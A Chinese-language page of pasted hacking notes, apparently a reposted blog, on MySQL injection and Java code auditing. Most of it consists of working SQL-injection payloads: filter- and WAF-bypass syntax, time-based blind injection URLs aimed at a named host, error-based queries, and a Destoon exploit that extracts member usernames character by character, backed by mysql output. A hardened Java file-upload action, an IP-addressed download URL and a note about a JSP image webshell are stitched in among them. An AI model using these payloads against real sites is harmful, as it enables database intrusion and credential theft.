mysql注入: \ 反斜杠的奥秘 slecet from ,char,取代where 关键字绕过的奥秘 多次过滤的奥秘:2,3次注入;update更新管理员 jsp图片马: 在F盘百度网盘有下载 桌面也有文件夹有 Java && .Net代码审计知识回顾: http://www.wooyun.org/bugs/wooyun-2014-053099 302跳转的大问题;小贺那个jsp并没有泄漏这些信息. http://58.214.247.138:8888/vacc/document/downdoc.do?docu_id=2 downloaddocument没有SESSION http://www.wooyun.org/bugs/wooyun-2010-061078 ' or[字段名字]<db_name()-- //关键字的绕过 【.NET小科普之一】数据库信息在哪儿 http://drops.wooyun.org/tips/975 http://blog.163.com/hero_213/blog/static/3989121420085267561179/ mapping.findForward->struts-config获取标签fail. HttpSession session = request.getSession(); String userid = (String)session.getAttribute("usersplatformuserid"); String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312"); if ((name == null) || ("".equals(name))) { return mapping.findForward("fail"); } nopted++;文件查找;整个目录查找class xxx 或者:public ServiceResponse private ServiceResponse public class ServiceResponse 搜索upload 这是upload的 import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileOutputStream; import java.util.Iterator; import java.util.List; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import org.apache.commons.fileupload.DiskFileUpload; import org.apache.commons.fileupload.FileItem; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; 这是download的 import com.jwx.jfa.dto.ServiceRequest; import com.jwx.jfa.dto.ServiceResponse; import com.jwx.jfa.dto.ServiceResponse.ServiceCode; import com.jwx.jfa.log.JfaLogger; import com.jwx.jfa.web.BaseAction; import com.jwx.nipm.vaccine.dto.DocumentDTO; import com.jwx.nipm.vaccine.util.DateUtil; import 
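com.jwx.nipm.vaccine.util.VaccineIdentity; import java.io.File; import java.io.FileInputStream; import java.util.Map; import javax.servlet.ServletOutputStream; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.commons.logging.Log; import org.apache.struts.action.ActionForm; import org.apache.struts.action.ActionForward; import org.apache.struts.action.ActionMapping; Linux环境upload
package com.jwx.nipm.vaccine.web.document;

import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileOutputStream;
import java.io.OutputStream;
import java.nio.file.Path;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;

/**
 * Struts action that stores one uploaded file under the local {@code document\} directory and
 * registers it through the "documentCommand" service.
 *
 * <p>Defects of the original implementation that are corrected here:
 * <ul>
 *   <li>the client-supplied file name was cut at its last backslash only, so a name without one
 *       (the normal case for non-Windows clients) crashed on {@code substring(-1)}, and a name
 *       containing {@code /} or {@code ..} segments was written wherever it pointed;</li>
 *   <li>{@code request.getParameter("name")} was dereferenced before its null check;</li>
 *   <li>the output stream was never closed when the write failed;</li>
 *   <li>a missing session user id reached {@code Integer.valueOf(null)} after the file was
 *       already on disk.</li>
 * </ul>
 * The action still accepts any file type. Whether an extension allowlist is required depends on
 * where {@code document\} is served from — TODO confirm the directory is not under a web root
 * that executes server-side pages.
 */
public class UploadDocumentAction extends BaseAction {

    /**
     * Storage directory as used by the original code. On Linux this is literally a directory
     * named {@code document\}; the string is kept unchanged because the matching download
     * action presumably resolves the same path — verify before renaming.
     */
    private static final String FILE_STORE = "document\\";

    /** Largest accepted file, in bytes (1 MiB, as in the original). */
    private static final long MAX_FILE_SIZE = 1048576L;

    /**
     * Handles one multipart upload request.
     *
     * @param mapping  Struts mapping providing the "success" and "fail" forwards
     * @param form     unused
     * @param request  multipart request carrying the "name" field, the file part and the session
     * @param response unused
     * @return the "success" forward when the file was stored and registered, otherwise "fail"
     * @throws Exception declared for compatibility with the original signature; every failure
     *         inside this method is caught and mapped to the "fail" forward
     */
    @Override
    public ActionForward execute(ActionMapping mapping, ActionForm form,
            HttpServletRequest request, HttpServletResponse response) throws Exception {
        try {
            ServiceRequest serviceRequest = generateRequest(request);
            serviceRequest.setIdentity(new VaccineIdentity());
            serviceRequest.setRequestedCommandID("documentCommand");
            serviceRequest.setParameter("action", "upload");

            // The uploader id comes from the session, never from the request. A request without
            // it is rejected here instead of failing in Integer.valueOf() after the write.
            HttpSession session = request.getSession();
            String userid = (String) session.getAttribute("usersplatformuserid");
            if (userid == null) {
                return mapping.findForward("fail");
            }

            // "name" is re-decoded as GB2312 exactly as before; the null check now precedes
            // the getBytes() call that used to throw on a missing parameter.
            String rawName = request.getParameter("name");
            if (rawName == null) {
                return mapping.findForward("fail");
            }
            String name = new String(rawName.getBytes("iso-8859-1"), "gb2312");
            if ("".equals(name)) {
                return mapping.findForward("fail");
            }

            File store = new File(FILE_STORE);
            if (!store.exists() && !store.mkdir()) {
                return mapping.findForward("fail");
            }

            DiskFileUpload fu = new DiskFileUpload();
            // Kept from the original: items below this size are held in memory. MAX_FILE_SIZE
            // is far smaller, so this threshold only matters for the parsed form fields.
            fu.setSizeThreshold(1073741824);
            @SuppressWarnings("unchecked") // parseRequest returns a raw List of FileItem
            List<FileItem> fileItems = fu.parseRequest(request);

            String fileName = null;
            long fileSize = 0L;
            byte[] content = null;
            for (FileItem fi : fileItems) {
                if (fi.isFormField()) {
                    continue; // the original read the field name here but never used it
                }
                fileName = fi.getName();
                fileSize = fi.getSize();
                if (fileSize > MAX_FILE_SIZE) {
                    return mapping.findForward("fail");
                }
                content = fi.get();
            }
            if (fileName == null || fileName.trim().isEmpty()) {
                throw new Exception("No file be selected!");
            }

            // Only the final path segment of the client name is used, and the resulting path
            // must stay inside the storage directory after normalisation.
            String baseName = baseName(fileName);
            if (baseName.isEmpty()) {
                return mapping.findForward("fail");
            }
            Path storeDir = store.toPath().toAbsolutePath().normalize();
            Path target = storeDir.resolve(baseName).normalize();
            if (!target.startsWith(storeDir)) {
                return mapping.findForward("fail");
            }
            try (OutputStream os = new FileOutputStream(target.toFile(), false)) {
                os.write(content);
            }

            DocumentDTO document = new DocumentDTO();
            document.setDocu_adder(Integer.valueOf(userid));
            document.setDocu_title(baseName);
            // Size in KiB, rounded up, formatted as in the original.
            document.setDocu_size(Integer.toString((int) Math.floor((fileSize + 1023L) / 1024L)));
            serviceRequest.setCurrentRequestObject(document);

            ServiceResponse serviceResponse = processRequest(serviceRequest);
            if (serviceResponse.getServiceCode() == ServiceCode.SUCCESS) {
                return mapping.findForward("success");
            }
            return mapping.findForward("fail");
        } catch (Exception e) {
            // Original behaviour: any failure is printed to stderr and mapped to "fail".
            e.printStackTrace();
        }
        return mapping.findForward("fail");
    }

    /**
     * Returns the last path segment of a client-supplied file name, whichever separator the
     * client's OS used. Some browsers send a full Windows path with backslashes, others a bare
     * name or a slash-separated path; only the final segment is ever used for storage.
     *
     * @param clientName file name exactly as sent in the multipart part
     * @return the trimmed final segment, possibly empty
     */
    private static String baseName(String clientName) {
        int cut = Math.max(clientName.lastIndexOf('\\'), clientName.lastIndexOf('/'));
        return clientName.substring(cut + 1).trim();
    }
}
mysql语法: select-1; select+1; select{x 1}; select.`1`.a; 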
select.``.schema_name from information_schema.schemata; http://rile.gou.gg/search?query=1%27>(select.``.schema_name from (select.``.schema_name,if(ascii(mid((select * from test.flag),1,1)) =102,(benchmark(5000000,sha(1))),1) from information_schema.schemata)x)%23 http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,0)%23 http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,1)%23 select * from corp where corp_id in (1,2,(if(1=1,3,2))) group by concat(version(),floor(rand(0)*2)) having min(0); 于是我们可以使用corp_id=1 and corp_name= 'xxxx'的形式最后获取corp_name的值 按道理类似的使用uname = ‘admin’ and upass = 'xxx'的方式获取pass的值 但是这里得靠字典将pass的字段爆破出来 http://zone.wooyun.org/content/23796 multipart/form-data PHP和Java通用的WAF绕过方法 http://zone.wooyun.org/content/24143 /*select*/SELECT`password`from `destoon_member` /*select*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1 GROUP BY + HAVING 是可以帮助我们定位的。 ### 字符猜解的绕过技巧 程序中过滤了很多猜解字符串需要的函数例如:substring/substr/left...但是好像忘记了right和mid? code 区域 sql = mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ) 找到字符以后,需要对字符串进行转换。这方面,程序对ascii、hex、ord、char进行了过滤,但是CONV呢? 
code 区域 CONV(mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ),16,10)=16 技巧一:select.``.password from destoon_member 技巧二:select!1,password from destoon_member mysql> SELECT LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)); SELECT MID('username',3,1); +---------------------------------------------------------------+ | LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)) | +---------------------------------------------------------------+ | e | +---------------------------------------------------------------+ 1 row in set +---------------------+ | MID('username',3,1) | +---------------------+ | e | +---------------------+ 1 row in set mysql> 拆分字符串之后,我们试着把字符串转为10进制。conv与括号之间加入注释符,依然是可以使用的。 code 区域 mysql> select conv/**/('ad',16,10); +----------------------+ | conv/**/('ad',16,10) | +----------------------+ | 173 | +----------------------+ 1 row in set ## 漏洞利用代码 猜解destoon_member里的username。 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT 0,13) 这个是转换后的代码,依然可以执行: code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 漏洞证明: 我们提交的原语句为 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 过滤后的语句为 code 区域 (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) 以下为测试SQL语句的可执行性 code 区域 mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223); 
+---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+ | (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) | +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+ | 0 | +---------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------+ 1 row in set mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13); +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+ | (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13) | +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+ | 1 | +---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------+ 1 row in set转载地址:http://rdmnn.baihongyu.com/